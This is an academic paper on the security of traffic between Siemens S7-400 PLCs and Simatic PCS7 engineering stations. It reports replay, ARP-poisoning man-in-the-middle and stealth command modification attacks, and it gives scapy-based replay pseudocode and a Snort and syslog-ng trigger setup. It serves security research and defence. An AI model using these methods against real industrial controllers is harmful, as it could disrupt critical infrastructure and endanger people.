international journal of critical infrastructure protection 22 (2018) 62–69

Available online at www.sciencedirect.com

journal homepage: www.elsevier.com/locate/IJCIP

On PLC network security

Asem Ghaleb a, Sami Zhioua a,∗, Ahmad Almulhem b

a Information and Computer Science Department, King Fahd University of Petroleum and Minerals, Saudi Arabia
b Computer Engineering Department, King Fahd University of Petroleum and Minerals, Saudi Arabia

a r t i c l e i n f o a b s t r a c t

Article history: Programmable Logic Controller (PLC) is an important component in modern Industrial Con-
Received 28 October 2015 trol Systems (ICS) particular in Supervisory Control and Data Acquisition (SCADA) systems.
Revised 19 October 2017 Disturbing the normal operation of PLCs can lead to significant damages ranging from mi-
Accepted 22 May 2018 nor annoyance to large scale incidents threatening the life of people. While most of ex-
Available online 11 June 2018 isting work in the SCADA security literature focuses on the communication between PLCs
and field devices, this paper presents a network security analysis of the communication
Keywords: between PLCs and the engineering stations in charge of setting up and configuring them.
Industrial Control Systems Security Interestingly, this aspect of SCADA security was exploited by the most famous SCADA at-
SCADA Security tack, namely, Stuxnet. Using a testbed with a common PLC device, we successfully carried
out three network attacks leading to serious compromise of typical PLCs.

© 2018 Elsevier B.V. All rights reserved.

used device in SCADA systems is the Programmable Logic

1. Introduction Controller (PLC). A PLC is a control device responsible for col-
lecting and processing input and output (I/O) data from field
Industrial control systems (ICS) refer to several classes of
devices (e.g. motors, pumps, sensors, etc.).
computer-based control systems that include supervisory
As its name indicates, a PLC is programmable, that is, by
control and data acquisition (SCADA) systems, distributed
loading a new program, the PLC can be reconfigured to func-
control systems (DCS), and Process Control Systems (PCS).
tion in a different way. Typically, a new program is loaded
These systems are widely used in the daily operation of many
by connecting the PLC with an engineering station (equipped
critical infrastructures and key resource (CIKR) sectors which
with a configuration software) via direct wire or through a
are related directly to the health and well-being of citizens.
LAN. In addition to reprogramming the PLC, the engineering
They include sectors such as energy, water, transportation,
station can send control commands to the PLC such as start,
chemical plants, communications, to name but few. A failure
stop, check status, etc. Therefore, an attacker who can inter-
in any of these sectors may have negative cascading impact
fere and/or compromise the communication between the en-
on our way of life. As such, their security is a major national
gineering station and the PLC can cause a lot of damage to
concern worldwide [1].
the whole SCADA system. Stuxnet attack [2,3], which targeted
SCADA is typically used to describe an ICS that monitors
Iran’s nuclear facilities, exploited this particular vulnerability
and controls transmission and distribution facilities. For ex-
and loaded a malicious program onto the PLCs. Apart from
ample, electrical transmission and distribution systems de-
Beresford’s talk in Black Hat, 2011 [4], this type of vulnerabil-
liver electricity, pipelines transport oil and gas, aqueducts
ity has not been studied in the literature. Most of the exist-
and distribution systems provide drinking water. A commonly
ing work focuses on the HMI-PLC and on the PLC-field devices

∗
Corresponding author.
E-mail addresses: [email protected] (A. Ghaleb), [email protected] (S. Zhioua), [email protected] (A. Almulhem).

https://doi.org/10.1016/j.ijcip.2018.05.004
1874-5482/© 2018 Elsevier B.V. All rights reserved.
 international journal of critical infrastructure protection 22 (2018) 62–69 63

communications [5–10] through protocols such as Modbus, between normal and abnormal behaviors. The IDS detection
DNP3, etc. The human machine interface (HMI) is a terminal accuracy was above 90% for response injection attacks, but
display device which is usually used to display the status of around 12% for replay attacks.
the PLC and the control process in a graphical way. HMI en- Morris and Gao tested a more complete set of network
ables operators to interact with the PLCs and give them some attacks on SCADA with a total of 17 attacks ranging from re-
commands. Moreover, the process output, alarms, events, etc connaissance, response injection, command injection and de-
are displayed on the HMI. Some vendors deploy the HMI appli- nial of service targeting mainly Modbus protocol [9]. The at-
cations as part of the Engineering Station; however, the main tacks were tested on the same SCADA security testbed used
functionality of the Engineering Station is to configure the PLC by Gao et al. [6]. Reconnaissance attacks ranged from address
network topology and to design and write PLC logic programs. scan to device identification. Response injection attack con-
This paper presents a security analysis of the network sists in injecting false data values in response packets sent by
communication between PLCs and engineering stations. In polled devices. Command injection attack consists in inject-
the rest of the paper, engineering station refers to a host with ing false commands by rogue devices to alter set points (e.g.
PLC configuration software. In a testbed equipped with a com- Low and High values of water storage tank), to alter system
mon PLC, namely, Siemens S7-400 in addition to its corre- control scheme (manual vs automatic), or to change register
sponding configuration software, namely, Simatic PCS7 8.1, we bits on mater devices. Denial of service attack is achieved by
successfully carried out three network security attacks which sending invalid Cyclic Redundancy Code (CRC), by transmit-
allowed to interfere with the PLC-PCS7 communication and ting out of turn packets, or by simple SYN flood.
send arbitrary commands to the PLC. The three security at- The most recent work studying network attacks on SCADA
tacks, namely, replay, Man-In-The-Middle (MITM), and com- systems is the one by Maynard et al. [10] which considers a
mand modification, are common IT network security attacks, less common protocol, namely, IEC60870-5-104 (104 for short,
but they are not typically used to interfere with PLC-PCS7 com- widely used in control communication for water, gas and
munication. electricity utilities and particularly common in European sys-
The paper is organized as follows. In Section 2, we re- tems). The work details two network attacks, namely, man-
view related work from the literature. In Section 3, we pro- in-the-middle and replay. Both attacks consist of three steps:
vide some details about PLCs, their communication with the detection (detects 104 hosts), capture (capturing packets us-
engineering stations, and related security considerations. The ing sniffers), and attack (either replaying or modifying pack-
PLC lab setup is presented in Section 4. In Sections 5–7, we il- ets). The replay attack consists of replaying packets as they
lustrate the replay, MITM, and stealth command modification are (without any modification). Consequentely, the attack does
attacks respectively. Finally, we provide conclusion remarks in not work since the TCP/IP kernel drops packets with the same
Section 8. ack and seq numbers. Even Wireshark tags them in black since
they are clearly replayed. The authors admit that the proof
of concept Replay attack can be made more efficient using a
python script to replace packet values which is exactly what
2. Related work
we did in this paper. The MITM attack uses ARP poisoning
between the SCADA server and the LAN gateway. Captured
A number of research papers detail network attacks on SCADA
packets are first cleaned (non 104 packets are dropped), then
systems. Most of existing work focuses on studying attacks on
the Cause of Transmission (CoT) flag is switched from ON
Modbus protocol, considered as the most established network
to OFF which is used to choose the correct program for pro-
protocol for Industrial Control Systems. Huisting et al. pro-
cessing the packet. Two testing environments have been used
posed an exhaustive taxonomy of attacks targeting the Mod-
for the MITM attack: a lab simulated environment and PRE-
bus protocol [11]. More than 200 attacks were reported and
CYSE [12] which is a real electricity distribution testbed.
briefly discussed covering both variants of Modbus, namely,
Almost all existing work in the literature focuses on study-
the Serial variant and the TCP variant. Although the taxonomy
ing network attacks while SCADA systems are running. All the
was exhaustive, no attack has been implemented nor tested.
attacks target the communication between MTUs (Master Ter-
Hence, for most of the listed attacks, there are no guarantees
minal Units, e.g. PLCs) and RTUs (Remote Terminal Units, e.g.
that they are feasible in practice.
pumps, switches, etc.). This paper deviates from most of the
Gao et al. reported and tested different categories of net-
existing work by focusing on the initial communication be-
work attacks on SCADA involving several protocols (Modbus,
tween a PLC and the engineering station (e.g. PCS7) whose aim
DNP3, Allen Bradley) [6]. The attack categories included re-
is to control and reprogram the PLC.
sponse injection, command injection, man-in-the-middle, re-
The closest work to ours was presented by Beresford [4], in
play, and denial of service. The attacks have been tested us-
which several attacks on the communication between the en-
ing a SCADA security laboratory (Mississipi State University
gineering station and the PLC are reported. Beresford showed
SCADA security lab) combining virtual hosts, simulated com-
that several attacks are possible on Siemens PLC S7-1200 and
ponents, and physical devices (Water storage tank, etc.). Ac-
S7-300 models such as replay, information retrieval, and even
cording to the authors, most of the attacks were possible be-
launching a remote shell on a PLC. However, by trying the re-
cause all common ICS protocols are not using authentication
ported attacks on our setting (Siemens PLC S7-400), they did
nor digital signature. In addition to attack reporting, Gao et al.
not work. The explanation is that the PLC firmware in our
implemented an Intrusion Detection System (IDS) for SCADA
setting is more recent and naturally more secure than the
based on Neural networks. The IDS works by distinguishing
64 international journal of critical infrastructure protection 22 (2018) 62–69

firmware used in the Beresford’s experiments. Also, our re- tems are not applicable in a network involving ICS field de-
play attack is more “interactive” than the Beresford’s since vices because of performance and other requirements of con-
some recorded packets are only replayed after a response is trol processes.
received from the PLC. Beresford’s replay attack consists sim-
ply in sending all the recorded packets in sequence without 3.2. Engineering station–PLC communication
considering any response from the PLC.
Major PLC manufacturers (Siemens, Allen-Bradley, Phoenix
Contact, etc.) provide efficient software environments to pro-
3. Programmable Logic Controller (PLC) gram and configure their PLCs. The programs are written in
a variety of languages including graphical languages such as
A PLC is a particular type of embedded devices that is pro- Ladder logic. PLC programs need to be efficient, lightweight
grammed to manage and control physical components (mo- and guarantee secure communication with the other field de-
tors, valves, sensors, etc.) based on system inputs and require- vices once deployed.
ments. A PLC typically has three main components, namely, Programming a PLC consists of uploading the written pro-
an embedded operating system, control system software, and gram to the PLC after it has been developed and tested at an
analog and digital inputs/outputs. Hence, a PLC can be consid- engineering station. Typically, the engineering station is con-
ered as a special digital computer executing specific instruc- nected to the PLC with Ethernet. This communication can be
tions that collect data from input devices (e.g. sensors), send- point-to-point involving a simple Ethernet cable between the
ing commands to output devices (e.g. valves), and transmitting PLC and the engineering station or is a part of a network in-
data to a central operations center. cluding other stations. Because the PLC program is in charge
PLCs are commonly found in supervisory control and data of controlling how the PLC works and commands field devices,
acquisition (SCADA) systems as field devices. Because they the upload procedure should be performed in a secure way.
contain a programmable memory, PLCs allows a customizable An adversary who can interfere with this uploading procedure
control of physical components through a user-programmable can launch a variety of attacks ranging from DOS to seizing full
interface. PLCs can be (re)configured using proprietary soft- control of the PLC.
ware installed on a standard computer (typically with Mi- Simatic PCS7 is the programming environment for Siemens
crosoft Windows OS). Reconfiguring the PLC consists in chang- PLCs. It is a comprehensive software suite offering a variety of
ing the control system software, known also as the program- features to configure control systems, in particular PLCs. The
ming layer of the PLC. This layer is in charge of providing software provides a graphical user interface for simple oper-
the PLC device with the logic to manage the connected field ation and clear display of configuration data. In order to up-
devices. The programming layer can be reprogrammed using load a new configuration program, an engineering station with
versions of typical languages such as C, Pascal, etc. To make Simatic PCS7 software communicates with the PLC through
the PLC programming more accessible, a graphical language Ethernet and using COTP (Connection Oriented Transport Pro-
called Ladder logic is used. Indeed, Ladder logic allows engi- tocol).
neers, who may be unfamiliar with full-fledged programming COTP protocol is an open systems transport layer proto-
languages, to reconfigure the PLC through an easy and intu- col built on the top of TCP. COTP is not commonly used and
itive graphical interface. is based on a very old specification (RFC 905 [14]). This en-
A very common example of the configuration software is abled us to record COTP packets traveling between PLC and
the Siemens Simatic Step 7 [13] for Simatic controllers. The the Engineering Station and then targeting PLC with several
software allows engineers to perform three main tasks: (1) attacks. We found that COTP related traffic is transferred in
write the graphical Ladder logic code, (2) compile it to machine plain text with no authentication. PLCs using COTP for com-
code for execution and (3) upload the compiled code to the de- munication with the Engineering Stations depend on pass-
vice. word protection or authentication which can be evaded easily
due to the fact that packets are transferred in plain text and
3.1. PLC security issues can be crafted. Very scarce documentation about COTP pro-
tocol is publicly available and few attempts were made to re-
PLCs are typically located at the edges of the SCADA net- verse engineer it [15]. Although the COTP protocol has been
work interfacing between the cyber and physical components. replaced by TCP in most applications, it is still being used by
Hence, PLCs are critical to the operation of the industrial pro- Simatic PCS7 software. This can be seen as a manifestation of
cess. An adversary, seizing control of a PLC, may cause signif- security-by-obscurity which is a common protection measure
icant damage to the whole industrial process. in ICS.
Besides, some characteristics of ICS field devices make As shown in Fig. 1, the three main commands that the en-
them more vulnerable to cyber attacks. First, they are typi- gineering station with Simatic PCS7 software can send to the
cally deployed for a long period of time (up to several decades). PLC are the following:
Second, ICS architectures often include several legacy devices
lacking basic security features and not allowing the integra- • Start command: turns the PLC on, assuming it is currently
tion of new security features. Third, due to the high availabil- turned off. The start command is typically used when
ity requirements, the replacement of field devices is not prac- re-programming the PLC. In particular, the start command
tically possible. Finally, common security solutions for IT sys- packets are sent along with the new PLC program packets.
 international journal of critical infrastructure protection 22 (2018) 62–69 65

Fig. 1 – Simatic PCS7 - PLC communication channel.

Fig. 2 – PLC lab setup.

• Stop command: turns off the PLC. oil and gas refineries, water and waste systems. Compared to
• Check status: enquires about the current status of the PLC. the more popular S7-300, S7-400 PLC is made for bigger and
complex machinery systems with a faster processor, larger
work memory and more Input/Output ports. Power is supplied
4. PLC lab setup to the PLC with a SITOP PSU8200 box. The engineering station
is a Windows 7 host equipped with Siemens Simatic PCS7 V8.0
Fig. 2 shows the PLC lab setup used to implement network at- software. Attacks are launched from an adversary station with
tacks on PLC. The PLC used in the lab is Siemens S7-400 which Kali Linux 1.09. The PLC as well as the stations are connected
is typically used in power plants (including nuclear), pipelines, through a network switch, namely, Siemens Scalance X208.
66 international journal of critical infrastructure protection 22 (2018) 62–69

• sr: Send and receive packets at layer 3

5. Replay attack • sr1: Send packets at layer 3 and return only the first answer
The first implemented PLC network attack is a typical replay • srp: Send and receive packets at layer 2
attack. The attack consists of 3 steps: starting a PCS7 com- • srp1: Send and receive packets at layer 2 and return only
mand (stop, start, etc.), capturing the packets, and replaying the first answer
the captured packets at a later time. The captured packets cor- • srloop: Send a packet at layer 3 in loop and print the answer
responding to a given command are first processed by filter- each time
ing out any packets that are not part of the command’s traffic. • srploop: Send a packet at layer 2 in loop and print the an-
Since PCS7-PLC communication uses the COTP protocol (port swer each time
102), any other packets are filtered out. In addition, only pack-
ets in the PCS7-PLC direction are kept (packets in the opposite In our program, we used the srp1 function because there
direction are filtered out). The cleaned traffic for each com- is always one single response packet sent by the PLC.
mand is then stored in a pcap file. Algorithm 1 shows the core of the python script using the
Initially, tcpreplay [16] suite is used to replay the recorded scapy features. The REPLAY subroutine takes as input the pcap
packets (cleaned pcap file). tcpreplay suite comes with differ- file, the network interface, the attacker’s IP address and port
ent tools such as tcpprep (packets pre-processor that isolates number. In addition, arbitrary values are chosen to initialize
packets in each direction), tcprewrite (pcap file editor which the ACK and RSTACK numbers. The for loop inside the sub-
rewrites packet headers), tcpreplay (replays pcap files onto the routine goes through the packets one by one. For each packet,
network), etc. Using these tools, the pcap file is pre-processed IP and TCP checksums are removed (lines 7 and 8) so that the
before replaying by changing the source IP address and re- network interface card recalculates newer values, the source
computing the checksum value in each packet. Once the pre- IP and port numbers are updated (lines 9 and 10), the sequence
processed pcap file is replayed on the PLC, most of the packets numbers are incremented (lines 12 and 20), the packet is re-
are discarded by the PLC and the replay attack fails. After in- played using either sendp function (for SYN and RST packets)
vestigation, it turns out that the packets are discarded for two or the srp1 function (lines 14 and 19).
main reasons. First, the sequence (SEQ) and acknowledgment The two other subroutines, namely, MITMCONF and MAIN
(ACK) numbers in the replayed packets are not changed. Con- are added to make the attack script self-contained. MITMCONF
sequently, the TCP/IP kernel at the PLC tags those packets as is in charge of configuring both Snort and syslog while the MAIN
duplicates and discards them. Second, tcpreplay tool replays is the driver function that will call either MITMCONF or REPLAY
the packets in the pcap file one after the other without waiting depending on the value of the last parameter.
for any response from the PLC. Hence, the PLC receives some The above python program has been tested using two at-
packets out of the proper sequence and discards them. This tack scenarios. In the first scenario, the replay attack was
problem has been recently observed by Maynard et al. [10]. launched from the same host (IP address) used for the cap-
To overcome these problems and to guarantee that the ture, that is, the host with PCS7 software. In the second sce-
replayed packets are accepted by the TCP/IP kernel at the nario, the replay attack was launched from a different host on
PLC, we resorted to write a customized python script using the same network, that is, the attacker machine with Kali. In
scapy [17]. Scapy is a powerful packet manipulation program each scenario, two types of commands are tried, namely, start
written in python and hence can be easily used in python and stop. The replay attack was successful in both scenarios
scripts. It features a variety of packet manipulation capabil- for both types of commands. Hence, an unknown attacker ma-
ities including: sniffing and replaying packets in the network, chine (without PCS7 software) on the same network can turn
network scanning, tracerouting, etc. However, the most useful the PLC ON or OFF by simply replaying a start or stop com-
scapy features for our replay attack are the ability to rewrite mand. This clearly might cause significant damage to a SCADA
the sequence and acknowledgment numbers and to match re- system.
quests and replies.
Dealing with the duplicate sequence and acknowledgment
numbers consists of recalculating these numbers and rewrit- 6. Man In the middle attack
ing them with scapy. Manipulating packet headers using scapy
is straightforward since any packet field is simply accessible The communication between PCS7 host and the PLC uses
by the dot operator (e.g. ip.src, tcp.flags, rcv[TCP].seq). Initially, COTP over Ethernet. Ethernet protocol uses Address Resolu-
random sequence and acknowledgment numbers are chosen. tion Protocol (ARP). Hence, theoretically the communication is
Then, at each packet sending, the numbers are incremented vulnerable to Man In The Middle (MITM) attacks through ARP
and added to the next packet. Poisoning.
Replaying packets in the appropriate sequence and time In a switched Ethernet network, a host A who tries to com-
requires waiting for the response of some packets before re- municate with a host B (with a known IP address) needs its
leasing the next packet. Scapy provides several variants of the physical address (MAC). The MAC address can be obtained by
Send function which is in charge of sending a packet in the broadcasting an ARP request to all hosts in the network. In
network. For packets not requiring a response (e.g. Acknowl- a normal scenario, only host B will send a response with the
edgment packet), the simple sendp function is used. The sendp correct IP-MAC pair. In an attack scenario, an attacker (host
function takes as input the packet as well as the network in- C) in the same network will send a fake response with a false
terface. For packets requiring a response, several functions can IP-MAC claiming to be the owner of B’s IP address. Typically,
be used: the attacker floods the network with its fake response forcing
 international journal of critical infrastructure protection 22 (2018) 62–69 67

the victim host (A) to accept the false pairing and ignore the
correct one sent by host B. ARP poisoning is typically launched
Algorithm 1 Replay a sequence of captured packets using between two hosts allowing the attacker to insert himself as
Scapy. a tunnel between the two victims and consequently sniff all
1: function replay(pcapfile, eth_interface, srcIP, srcPort) packets between them.
2: recvSeqNum ← 0 In our scenario, an ARP poisoning MITM attack is imple-
3: SYN ← True mented between the PCS7 host and the PLC using ettercap
4: for packet in rdpcap(pcapfile) do tool [18]. The attack is successful and all the packets ex-
5: ip ← packet[IP] changed between the PCS7 and PLC are tunneled through the
6: tcp ← packet[TCP] attacker host (Kali). A MITM attack can be passive or active. A
7: del ip.chksum  Clearing the checksums passive version consists in simply observing the traffic of the
8: ip.src ← srcIP  Specify the attacker machine IP and PLC and hence breaking the confidentiality of the commands
PORT sent to the PLC. An active version is more dangerous since it
9: ip.sport ← srcPort allows the attacker to tamper with the packets and commands
10: if tcp.flags == ACK or tcp.flags == RSTACK then and consequently interfere with the normal operation of the
11: tcp.ack ← recvSeqNum+1 system.
12: if SYN or tcp.flags == RSTACK then
13: sendp(packet, iface=eth_interface)
14: SYN ← False 7. Stealth command modification attack
15: continue
16: end if The third attack is a combination of replay and MITM attacks
17: end if which aims at sniffing the traffic between the PCS7 and PLC
18: rcv ← srp1(packet, iface=eth_interface) and then interfering with sent commands by replaying other
19: recvSeqNum ← rcv[TCP].seq commands in a stealth way. Through this attack, an adver-
20: end for sary can completely change the behavior of the SCADA system
21: end function since sending a command leads to the execution of another
22: function mitmconf(eth_interface) command.
23: snort_conf_file ← ’/etc/snort/snort.conf’ The attack goes through three main steps: MITM attack,
24: syslog_Conf_file ← ’/etc/syslog-ng/syslog-ng.conf’ command detection, and replay of a false command. Fig. 3
25: # Configuring Snort illustrates the attack. Initially, the attacker (Kali) starts by
26: fsnort ← open(snort_Conf_file, ’a’) launching a MITM attack to place himself between the PCS7
27: fsnort.write(”output alert_syslog: LOG_LOCAL6 and the PLC exactly as described in the previous section. Then,
LOG_ALERT”) it stays in an idle state observing the traffic passively and wait-
28: fsnort.close() ing for commands sent by the PCS7 host to the PLC (Step 1
29: # Configuring syslog in Fig. 3). For the sake of command detection in the network,
30: fsyslog ← open(syslog_Conf_file, ’a’) Snort intrusion detection system (IDS) [19] is used. Snort is a
31: fsyslog.write(”filter f_start_plc”) signature-based network IDS which allows to detect patterns
32: fsyslog.write(”facility(local6) and match(”snort” value of traffic inside the network. Currently, Snort is configured to
(”PLC START”) detect two types of commands, namely, start and stop. As soon
33: fsyslog.write(”filter f_stop_plc”) as the attacker detects a command from the PCS7 host to the
34: fsyslog.write(”facility(local6) and match(”snort” value PLC (Step 2), a different command will be replayed to the PLC
(”PLC STOP”) (Step 4). That is, if a start command is detected, the attacker
35: fsyslog.write(”Program (”python /root/replay.py replays a stop command to the PLC. If a stop command is de-
stop.pcap ”+ inface”) tected, the attacker replays a start command (with a different
36: fsyslog.close() PLC program1 ) to the PLC. However, it is easy to notice that
37: end function if the attacker interferes with a start command to make it
38: function main a stop command (or the opposite), the PCS7 will quickly no-
39: if len(sys.argv) != 6) then tice that something is wrong. To make the attack as stealth
40: exit(1) as possible, the attacker continues the communication with
41: end if the PCS7 host while impersonating the PLC (Step 3). So for
42: if sys.argv[5] == 1 then the PCS7 host the communication appears to be perfectly nor-
43: MITMCONF(sys.argv[2]) mal. This technique has been used by Stuxnet in its famous
44: end if attack on Iran’s nuclear facility. Indeed, to make the attack
45: if sys.argv[5] == 2 then stealth, Stuxnet recorded normal frequency values. Then, at
46: REPLAY(sys.argv[1], sys.argv[2], sys.argv[3], attack time, it played those recorded frequencies to make the
sys.argv[4]) monitoring system believes that centrifuges are operating as
47: end if normal [2,3].
48: end function
1
Recall that start command is sent along with the new PLC pro-
gram packets (Section 3).
68 international journal of critical infrastructure protection 22 (2018) 62–69

Fig. 3 – Stealth command modification attack.

Snort is an IDS which allows only to detect known pat- challenge specially with the light size of PLCs’ memory which
terns in the network traffic. However, the stealth command makes it difficult to do encryption and decryption inside the
modification attack requires the launching of the replay at- memory of PLCs. However, hardware cipher models can be
tack (python program) as soon as a command is detected in used as extended modules attached to the PLCs. In addition,
the traffic. To fill this gap, Snort is configured to log alerts to static entries of the ARP tables can be used to provide a level of
Syslog-ng utility [20]. In turn, Syslog-ng is configured to trig- defense against MITM attacks. The PLC response time during
ger the replay attack upon the reception of appropriate Snort the normal communication is slightly less than while work-
alerts. ing under MITM attack, this factor can be used to detect and
prevent MITM attacks.

8. Conclusion
Acknowledgment
Securing SCADA systems is a major concern worldwide, as
such system are responsible for the daily operation of mod- The authors would like to acknowledge the support of the
ern critical infrastructures and industries. In this work, we National Science, Technology and Innovation Plan (NSTIP) un-
demonstrated that a SCADA system can be seriously com- der project number 13-INF281-04.
promised by mounting network attacks targeting PLCs. PLCs
are very common components in SCADA systems. They sit
references
between HMIs and field devices and are in charge of send-
ing commands and receiving data to/from field devices. Since
a PLC is programmable, it can be completely compromised
[1] A. Nicholson, S. Webber, S. Dyer, T. Patel, H. Janicke, Scada
by loading a malicious control program. Through the de-
security in the light of cyber-warfare, Computers &
tailed description and implementation of three attacks (Re- Securityvol. 31(4) (2012) pp. 418–436.
play, MITM, and command modification), we showed that the [2] N. Falliere, L. Murchu, E. Chien, W32.Stuxnet Dossier,
communication between the PLC and the engineering station Symantec Security Response(2012).
can be compromised leading to serious SCADA system insta- [3] S. Zhioua, The middle east under malware attack: Dissecting
bility. We showed that, with open source tools and simple cyber weapons, Proceedings of the IEEE ICDCS Workshop on
Network Forensics, Security and Privacy (NFSP) (2013).
python scripts, one can mount successful attacks. In partic-
[4] D. Beresford, Exploiting Siemens Simatic S7 PLC, Black
ular, programming and configuration traffic directed to PLCs
HatUSA (2011).
may be replayed, sniffed, and/or modified. PLCs can be pro- [5] P. Huitsing, R. Chandia, M. Papa, S. Sheno, Attack taxonomies
tected against the discussed attacks mainly by providing a for the Modbus protocol, International Journal of Critical
level of encryption for the transferred packets. This can be a Infrastructure Protection 1(0) (2008) 37–44.
 international journal of critical infrastructure protection 22 (2018) 62–69 69

[6] W. Gao, T. Morris, B. Reaves, D. Richey, SCADA Control System [11] M. Organization, Modbus protocol specification,
Command and Response Injection and Intrusion Detection, http://www.modbus.org.
eCrime Researchers Summit (eCrime)(2010) 1–9. [12] K.M. Laughlin, S. Sezer, P. Smith, Z. Ma, F. Skopik, PRECYSE:
[7] L. Pietre-Cambacedes, M. Tritschler, G. Ericsson, Cyber-attack detection and response for industrial control
Cybersecurity myths on power control systems: 21 systems, Proceedings of the Second International
misconceptions and false beliefs, IEEE Transactions on Power Symposium on ICS & SCADA Cyber Security Research,
Deliveryvol. 26(1) (2011) pp. 161–172. ICS-CSR(2014) pp. 67–71.
[8] Y. Yang, K.M. Laughlin, T. Littler, S. Sezer, E.G. Im, Z. Yao, B. [13] A.G. Siemens, The simatic PCS7 process control system
Prang-gono, H. Wang, Man-in-the-middle attack test-bed brochure, April 2013.
investigating cyber-security vulnerabilities in smart grid [14] Network Working Group, ISO transport protocol specification
scada systems, Proceedings of the International Conference (RFC 905), April 1984.
on Sustainable Power Generation and Supply (SUPERGEN) [15] G. Devarajan, Unraveling SCADA protocols: Using sulley
(2012) pp. 1–8. fuzzer, Proceedings of the DEFCON Fifteenth Hacking
[9] T. Morris, W. Gao, Industrial control system cyber attacks, Conference(2007).
Proceedings of the First International Symposium on ICS & [16] tcpreplay, http://tcpreplay.synfin.net.
SCADA Cyber Security Research, ICS-CSR(2013) pp. 22–29. [17] P. Biondi, Scapy, http://www.secdev.org/projects/scapy.
[10] P. Maynard, K.M. Laughlin, B. Haberler, Towards [18] A.a. NaGA, Ettercap, http://ettercap.sourceforge.net.
understanding man-in-the-middle attacks on IEC [19] M. Roesch, Snort: Lightweight Intrusion Detection for
60870-5-104 SCADA networks, in: Proceedings of the Second Networks, LISA vol. 99(1) (1999) pp. 229–238.
International Symposium on ICS & SCADA Cyber Security [20] R. Gerhards, The syslog protocol (RFC 5425), March 2009.
Research, ICS-CSR, 2014, pp. 30–42.